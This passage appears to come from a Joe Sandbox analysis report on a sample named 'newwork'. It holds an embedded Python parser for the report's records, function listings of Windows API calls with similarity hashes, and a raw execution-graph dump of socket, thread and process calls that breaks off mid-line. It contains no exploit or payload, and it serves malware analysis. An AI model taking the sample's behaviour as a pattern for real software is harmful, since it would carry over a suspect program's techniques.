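• Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
• CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
  • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
Strings
Similarity
• API ID: CloseCreateErrorHandleLastProcess
• String ID: 0nI
• API String ID: 3798668922-794067871
• Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
"""

# Section headers exactly as they appear in the report.
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# "Part of subcall function XXXX: Name.MODULE(args), ref: YYYY" or the same
# line without the subcall prefix.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
STRING_RE = re.compile(r"^(?P<value>.*), xrefs: (?P<xref>[0-9A-Fa-f]+)$")

# Editor's own list of APIs that hand execution to another image.
PROCESS_LAUNCH_APIS = {"CreateProcessA", "CreateProcessW", "ShellExecuteA",
                       "ShellExecuteW", "ShellExecuteEx", "ShellExecuteExA",
                       "ShellExecuteExW", "WinExec"}
UNINSTALL_KEY = r"Software\Microsoft\Windows\CurrentVersion\Uninstall"


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                      # call-site address, upper-case hex
    subcall: Optional[str]        # address of the callee when reported as "Part of subcall"


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)   # (value, xref)
    similarity: Dict[str, str] = field(default_factory=dict)

    @property
    def api_string_id(self) -> Optional[Tuple[str, str]]:
        """Split the report's 'API String ID: a-b' into its two hash halves."""
        raw = self.similarity.get("API String ID")
        if not raw or "-" not in raw:
            return None
        left, right = raw.split("-", 1)
        return left, right


def parse_records(text: str) -> List[FunctionRecord]:
    """Every record in the report opens with an 'APIs' header; use that as the
    record boundary and route bullet lines to the section they belong to."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                current.apis.append(ApiCall(m["name"], m["module"],
                                            [a.strip() for a in m["args"].split(",")],
                                            m["ref"].upper(), m["sub"]))
        elif section == "Strings":
            m = STRING_RE.match(item)
            if m:
                current.strings.append((m["value"], m["xref"].upper()))
        elif section == "Similarity":
            key, _, value = item.partition(":")
            current.similarity[key.strip()] = value.strip()
    return records


def classify(rec: FunctionRecord) -> Set[str]:
    """Tag a record: touches installer uninstall keys, or launches a process."""
    tags: Set[str] = set()
    if any(call.name in PROCESS_LAUNCH_APIS for call in rec.apis):
        tags.add("process_launch")
    for value, _xref in rec.strings:
        # Inno Setup names its uninstall key "<AppId>_is1" under this path.
        if value.lower() == UNINSTALL_KEY.lower() or value.endswith("_is1"):
            tags.add("installer_uninstall_key")
    return tags


if __name__ == "__main__":
    for n, rec in enumerate(parse_records(SAMPLE_RECORDS), 1):
        print(n, rec.similarity.get("API ID"), sorted(classify(rec)),
              [c.name for c in rec.apis])
```

                                                                                         To use it on a saved report, feed the text of the function listing to `parse_records` and filter on `classify`; the subcall address and the `ref` field give the IDA addresses to jump to in the `hcaresult_1_2_400000_newwork.jbxd` snapshot named in each record.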
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesErrorFileLast
                                                                                        • String ID: T$H
                                                                                        • API String ID: 1799206407-488339322
                                                                                        • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                        • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                        • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                        • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                        APIs
                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteErrorFileLast
                                                                                        • String ID: T$H
                                                                                        • API String ID: 2018770650-488339322
                                                                                        • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                        • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                        • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                        • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                        APIs
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryErrorLastRemove
                                                                                        • String ID: T$H
                                                                                        • API String ID: 377330604-488339322
                                                                                        • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                        • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                        • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                        • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                        APIs
                                                                                          • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(73AF0000,00481A2F), ref: 0047D0E2
                                                                                          • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                          • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                        • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                        • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                        Strings
                                                                                        • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                        • String ID: Detected restart. Removing temporary directory.
                                                                                        • API String ID: 1717587489-3199836293
                                                                                        • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                        • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                        • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                        • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                        • GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandHandleLineModule
                                                                                        • String ID: `6\
                                                                                        • API String ID: 2123368496-1549246104
                                                                                        • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                        • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                                        • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                        • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 1458359878-0
                                                                                        • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                        • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                        • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                        • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.4%
                                                                                        Dynamic/Decrypted Code Coverage:83.9%
                                                                                        Signature Coverage:6.7%
                                                                                        Total number of Nodes:958
                                                                                        Total number of Limit Nodes:32
61000->61001 61002 b07357 61000->61002 61005 b069e9 61001->61005 61391 b02ac7 61001->61391 61388 b08601 61002->61388 61005->60878 61006 b09729 61005->61006 61007 b0fb20 Mailbox 68 API calls 61006->61007 61009 b09743 61007->61009 61008 b06a2f 61008->60884 61008->60893 61009->61008 61444 b02db5 61009->61444 61011->60884 61012->60888 61013->60878 61014->60857 61015->60920 61016->60922 61017->60918 61019 b0d00e __EH_prolog 61018->61019 61020 b127c5 _Allocate 60 API calls 61019->61020 61021 b0d025 61020->61021 61021->60926 61023 b0513d 61022->61023 61024 b0fb49 61022->61024 61023->60931 61025 b123b4 __cinit 68 API calls 61024->61025 61025->61023 61027 b0fb20 Mailbox 68 API calls 61026->61027 61028 b0bef7 61027->61028 61029 b0c006 61028->61029 61031 b02b95 61028->61031 61029->60937 61032 b02bb1 61031->61032 61033 b02bc7 61031->61033 61034 b0fb20 Mailbox 68 API calls 61032->61034 61035 b02bdf 61033->61035 61037 b02bd2 61033->61037 61036 b02bb6 61034->61036 61035->61036 61038 b02be2 WSASetLastError WSARecv 61035->61038 61041 b0fb20 68 API calls Mailbox 61035->61041 61042 b02d22 61035->61042 61044 b02cbc WSASetLastError select 61035->61044 61036->61028 61040 b0fb20 Mailbox 68 API calls 61037->61040 61046 b0950d 61038->61046 61040->61036 61041->61035 61049 b01996 68 API calls __cinit 61042->61049 61045 b0950d 69 API calls 61044->61045 61045->61035 61047 b0fb20 Mailbox 68 API calls 61046->61047 61048 b09519 WSAGetLastError 61047->61048 61048->61035 61049->61036 61050->60959 61059 b123c9 61051->61059 61054 b11124 61054->60961 61055 b1114d ResumeThread 61055->60961 61056 b11146 CloseHandle 61056->61055 61057->60964 61060 b123d7 61059->61060 61061 b123eb 61059->61061 61083 b14acb 59 API calls __getptd_noexit 61060->61083 61063 b1762a __calloc_crt 59 API calls 61061->61063 61064 b123f8 61063->61064 61066 b12449 61064->61066 61078 b148ca 61064->61078 61065 b123dc 61084 b13b65 9 API calls __cftof2_l 61065->61084 61069 b11f84 _free 59 API calls 61066->61069 61071 b1244f 61069->61071 
61073 b1111b 61071->61073 61085 b14aaa 59 API calls 3 library calls 61071->61085 61072 b14951 __initptd 59 API calls 61074 b1240e CreateThread 61072->61074 61073->61054 61073->61055 61073->61056 61074->61073 61077 b12441 GetLastError 61074->61077 61102 b12529 61074->61102 61077->61066 61086 b148e2 GetLastError 61078->61086 61080 b148d0 61081 b12405 61080->61081 61100 b16ffd 59 API calls 3 library calls 61080->61100 61081->61072 61083->61065 61084->61073 61085->61073 61087 b17d8b __getptd_noexit TlsGetValue 61086->61087 61088 b148f7 61087->61088 61089 b14945 SetLastError 61088->61089 61090 b1762a __calloc_crt 56 API calls 61088->61090 61089->61080 61091 b1490a 61090->61091 61091->61089 61101 b17daa TlsSetValue 61091->61101 61093 b1491e 61094 b14924 61093->61094 61095 b1493c 61093->61095 61096 b14951 __initptd 56 API calls 61094->61096 61097 b11f84 _free 56 API calls 61095->61097 61098 b1492c GetCurrentThreadId 61096->61098 61099 b14942 61097->61099 61098->61089 61099->61089 61101->61093 61103 b12532 __threadstartex@4 61102->61103 61104 b17d8b __getptd_noexit TlsGetValue 61103->61104 61105 b12538 61104->61105 61106 b1256b 61105->61106 61107 b1253f __threadstartex@4 61105->61107 61135 b1475f 59 API calls 6 library calls 61106->61135 61134 b17daa TlsSetValue 61107->61134 61110 b1254e 61111 b12561 GetCurrentThreadId 61110->61111 61112 b12554 GetLastError RtlExitUserThread 61110->61112 61113 b12586 ___crtIsPackagedApp 61111->61113 61112->61111 61117 b1259a 61113->61117 61118 b124d1 61113->61118 61124 b12462 61117->61124 61119 b12513 RtlDecodePointer 61118->61119 61120 b124da LoadLibraryExW GetProcAddress 61118->61120 61123 b12523 61119->61123 61121 b124fd RtlEncodePointer 61120->61121 61122 b124fc 61120->61122 61121->61119 61122->61117 61123->61117 61125 b1246e _doexit 61124->61125 61126 b148ca _LocaleUpdate::_LocaleUpdate 59 API calls 61125->61126 61127 b12473 61126->61127 61136 b11170 61127->61136 61130 b12483 61131 b17954 __XcptFilter 59 API calls 61130->61131 61132 
b12494 61131->61132 61134->61110 61135->61113 61154 b10620 61136->61154 61139 b111c0 61176 b0cdb8 61139->61176 61140 b111b8 TlsSetValue 61140->61139 61145 b124a3 61146 b148e2 __getptd_noexit 59 API calls 61145->61146 61147 b124ac 61146->61147 61148 b124c7 RtlExitUserThread 61147->61148 61149 b124c0 61147->61149 61150 b124bb 61147->61150 61292 b14894 59 API calls 2 library calls 61149->61292 61291 b125a6 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61150->61291 61153 b124c6 61153->61148 61168 b10684 61154->61168 61155 b10716 61192 b131bb 61155->61192 61156 b10700 61156->61155 61158 b10713 CloseHandle 61156->61158 61157 b1069c 61159 b106de ResetEvent 61157->61159 61162 b106b5 OpenEventA 61157->61162 61199 b10c20 GetCurrentProcessId 61157->61199 61158->61155 61164 b106e5 61159->61164 61161 b107ac WaitForSingleObject 61161->61168 61166 b106d7 61162->61166 61167 b106cf 61162->61167 61163 b1072e 61163->61139 61163->61140 61200 b10860 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61164->61200 61166->61159 61166->61164 61167->61166 61170 b106d4 CloseHandle 61167->61170 61168->61156 61168->61157 61168->61161 61171 b10780 CreateEventA 61168->61171 61174 b1079e CloseHandle 61168->61174 61201 b10c20 GetCurrentProcessId 61168->61201 61169 b106b2 61169->61162 61170->61166 61171->61168 61174->61168 61175 b106fd 61175->61156 61177 b0cdda 61176->61177 61203 b04d86 61177->61203 61178 b0cddd 61180 b10f40 61178->61180 61181 b10f79 TlsGetValue 61180->61181 61189 b10f71 Mailbox 61180->61189 61181->61189 61182 b10fed 61183 b11016 61182->61183 61185 b1100e GetProcessHeap HeapFree 61182->61185 61183->61145 61184 b10fc9 61186 b10620 17 API calls 61184->61186 61185->61183 61188 b10fd8 61186->61188 61187 b11059 GetProcessHeap HeapFree 61187->61189 61188->61182 61190 b10fe5 TlsSetValue 61188->61190 61189->61182 61189->61184 61189->61187 61191 b1104b GetProcessHeap HeapFree 61189->61191 61190->61182 61191->61187 61193 b131c3 61192->61193 61194 b131c5 
IsProcessorFeaturePresent 61192->61194 61193->61163 61196 b1814f 61194->61196 61202 b180fe 5 API calls 2 library calls 61196->61202 61198 b18232 61198->61163 61199->61169 61200->61175 61201->61168 61202->61198 61204 b04d90 __EH_prolog 61203->61204 61205 b0fb20 Mailbox 68 API calls 61204->61205 61206 b04da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61205->61206 61207 b050d4 shared_ptr 61206->61207 61217 b04dd1 std::bad_exception::bad_exception 61206->61217 61207->61178 61209 b050a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61210 b050b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61209->61210 61210->61207 61210->61217 61211 b09729 73 API calls 61211->61217 61213 b04e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61214 b04e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61213->61214 61214->61217 61215 b0bedd 73 API calls 61215->61217 61217->61209 61217->61210 61217->61211 61217->61213 61217->61214 61217->61215 61223 b04bed 61217->61223 61247 b06d28 60 API calls 61217->61247 61248 b0c00f 60 API calls 2 library calls 61217->61248 61249 b06d02 60 API calls std::bad_exception::bad_exception 61217->61249 61250 b099b6 60 API calls 2 library calls 61217->61250 61251 b09a8e 210 API calls 3 library calls 61217->61251 61252 b10900 GetProcessHeap HeapFree 61217->61252 61253 b04100 GetProcessHeap HeapFree 61217->61253 61224 b04bf7 __EH_prolog 61223->61224 61225 b01ba7 209 API calls 61224->61225 61226 b04c31 61225->61226 61254 b03a94 61226->61254 61228 b04c3c 61229 b03a94 60 API calls 61228->61229 61230 b04c56 61229->61230 61257 b075d6 61230->61257 61235 b0fb20 Mailbox 68 API calls 61236 b04cb8 61235->61236 61282 b0b294 61236->61282 61238 b04ce1 InterlockedExchange 61286 b02995 95 API calls Mailbox 61238->61286 61240 b04d3c 61290 b0761f 75 API calls 2 library calls 61240->61290 61245 b04d57 shared_ptr 61245->61217 61246 b04d06 61246->61240 61287 b07592 76 API calls Mailbox 61246->61287 61288 b072fc 82 API calls Mailbox 61246->61288 61289 b02995 95 API calls 
Mailbox 61246->61289 61247->61217 61248->61217 61249->61217 61250->61217 61251->61217 61252->61217 61253->61217 61255 b039ee 60 API calls 61254->61255 61256 b03ab5 61255->61256 61256->61228 61258 b0fb20 Mailbox 68 API calls 61257->61258 61259 b075ec 61258->61259 61260 b08a25 77 API calls 61259->61260 61261 b07606 61260->61261 61262 b01712 60 API calls 61261->61262 61263 b04c8b 61262->61263 61264 b0d0fc 61263->61264 61265 b0d106 __EH_prolog 61264->61265 61266 b01a01 61 API calls 61265->61266 61267 b0d11d 61266->61267 61268 b0d15a InterlockedExchangeAdd 61267->61268 61269 b0fb20 Mailbox 68 API calls 61267->61269 61271 b0d195 RtlEnterCriticalSection 61268->61271 61272 b0d18a 61268->61272 61269->61268 61274 b06f5f 60 API calls 61271->61274 61273 b01ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61272->61273 61276 b0d193 61273->61276 61275 b0d1bb InterlockedIncrement 61274->61275 61277 b0d1d2 RtlLeaveCriticalSection 61275->61277 61278 b0d1cb 61275->61278 61279 b0d856 TlsGetValue 61276->61279 61277->61276 61280 b027f3 SetWaitableTimer 61278->61280 61281 b04ca4 61279->61281 61280->61277 61281->61235 61283 b0b2a7 61282->61283 61284 b0b2d0 61283->61284 61285 b0d9c5 83 API calls 61283->61285 61284->61238 61285->61284 61286->61246 61287->61246 61288->61246 61289->61246 61290->61245 61291->61149 61292->61153 61293->60979 61295 b0d33e __EH_prolog 61294->61295 61296 b127c5 _Allocate 60 API calls 61295->61296 61297 b0d347 61296->61297 61298 b01bfa RtlEnterCriticalSection 61297->61298 61300 b0d555 61297->61300 61298->60984 61301 b0d55f __EH_prolog 61300->61301 61304 b026db RtlEnterCriticalSection 61301->61304 61303 b0d5b5 61303->61298 61305 b02728 CreateWaitableTimerA 61304->61305 61306 b0277e 61304->61306 61308 b02738 GetLastError 61305->61308 61309 b0275b SetWaitableTimer 61305->61309 61307 b027d5 RtlLeaveCriticalSection 61306->61307 61310 b127c5 _Allocate 60 API calls 61306->61310 61307->61303 61311 b0fb20 
Mailbox 68 API calls 61308->61311 61309->61306 61312 b0278a 61310->61312 61313 b02745 61311->61313 61315 b127c5 _Allocate 60 API calls 61312->61315 61319 b027c8 61312->61319 61348 b01712 61313->61348 61316 b027a9 61315->61316 61320 b01cf8 CreateEventA 61316->61320 61354 b06e07 CloseHandle 61319->61354 61321 b01d52 CreateEventA 61320->61321 61322 b01d23 GetLastError 61320->61322 61323 b01d96 61321->61323 61324 b01d6b GetLastError 61321->61324 61326 b01d33 61322->61326 61325 b123c9 __beginthreadex 201 API calls 61323->61325 61327 b01d7b 61324->61327 61328 b01db6 61325->61328 61329 b0fb20 Mailbox 68 API calls 61326->61329 61330 b0fb20 Mailbox 68 API calls 61327->61330 61331 b01dc6 GetLastError 61328->61331 61332 b01e0d 61328->61332 61333 b01d3c 61329->61333 61334 b01d84 61330->61334 61340 b01dd8 61331->61340 61335 b01e11 WaitForSingleObject CloseHandle 61332->61335 61336 b01e1d 61332->61336 61337 b01712 60 API calls 61333->61337 61339 b01712 60 API calls 61334->61339 61335->61336 61336->61319 61338 b01d4e 61337->61338 61338->61321 61339->61323 61341 b01ddc CloseHandle 61340->61341 61342 b01ddf 61340->61342 61341->61342 61343 b01de9 CloseHandle 61342->61343 61344 b01dee 61342->61344 61343->61344 61345 b0fb20 Mailbox 68 API calls 61344->61345 61346 b01dfb 61345->61346 61347 b01712 60 API calls 61346->61347 61347->61332 61349 b0171c __EH_prolog 61348->61349 61350 b0173e 61349->61350 61355 b01815 59 API calls std::exception::exception 61349->61355 61350->61309 61352 b01732 61356 b094a6 60 API calls 2 library calls 61352->61356 61354->61307 61355->61352 61368 b030ae WSASetLastError 61357->61368 61359 b03c90 61362 b016ae 61359->61362 61361 b030ae 71 API calls 61361->61359 61363 b016b8 __EH_prolog 61362->61363 61364 b01701 61363->61364 61384 b114e3 59 API calls std::exception::_Copy_str 61363->61384 61364->60993 61366 b016dc 61385 b094a6 60 API calls 2 library calls 61366->61385 61369 b030ec WSAStringToAddressA 61368->61369 61370 b030ce 61368->61370 61372 b0950d 69 API calls 
61369->61372 61370->61369 61371 b030d3 61370->61371 61373 b0fb20 Mailbox 68 API calls 61371->61373 61374 b03114 61372->61374 61375 b030d8 61373->61375 61376 b03154 61374->61376 61377 b0311e _memcmp 61374->61377 61375->61359 61375->61361 61379 b0fb20 Mailbox 68 API calls 61376->61379 61383 b03135 61376->61383 61381 b0fb20 Mailbox 68 API calls 61377->61381 61377->61383 61378 b03193 61378->61375 61382 b0fb20 Mailbox 68 API calls 61378->61382 61379->61383 61380 b0fb20 Mailbox 68 API calls 61380->61378 61381->61383 61382->61375 61383->61378 61383->61380 61384->61366 61386->60999 61387->60998 61409 b0353e 61388->61409 61392 b02ae8 WSASetLastError connect 61391->61392 61393 b02ad8 61391->61393 61395 b0950d 69 API calls 61392->61395 61394 b0fb20 Mailbox 68 API calls 61393->61394 61397 b02add 61394->61397 61396 b02b07 61395->61396 61396->61397 61399 b0fb20 Mailbox 68 API calls 61396->61399 61398 b0fb20 Mailbox 68 API calls 61397->61398 61400 b02b1b 61398->61400 61399->61397 61401 b0fb20 Mailbox 68 API calls 61400->61401 61403 b02b38 61400->61403 61401->61403 61405 b02b87 61403->61405 61442 b03027 71 API calls Mailbox 61403->61442 61404 b02b59 61404->61405 61443 b02fb4 71 API calls Mailbox 61404->61443 61405->61005 61407 b02b7a 61407->61405 61408 b0fb20 Mailbox 68 API calls 61407->61408 61408->61405 61410 b03548 __EH_prolog 61409->61410 61411 b03576 61410->61411 61412 b03557 61410->61412 61431 b02edd WSASetLastError WSASocketA 61411->61431 61439 b01996 68 API calls __cinit 61412->61439 61416 b035ad CreateIoCompletionPort 61417 b035c5 GetLastError 61416->61417 61418 b035db 61416->61418 61420 b0fb20 Mailbox 68 API calls 61417->61420 61419 b0fb20 Mailbox 68 API calls 61418->61419 61421 b035d2 61419->61421 61420->61421 61422 b03626 61421->61422 61423 b035ef 61421->61423 61441 b0cef7 60 API calls 2 library calls 61422->61441 61424 b0fb20 Mailbox 68 API calls 61423->61424 61425 b03608 61424->61425 61440 b029ee 76 API calls Mailbox 61425->61440 61428 b0355f 61428->61001 61429 
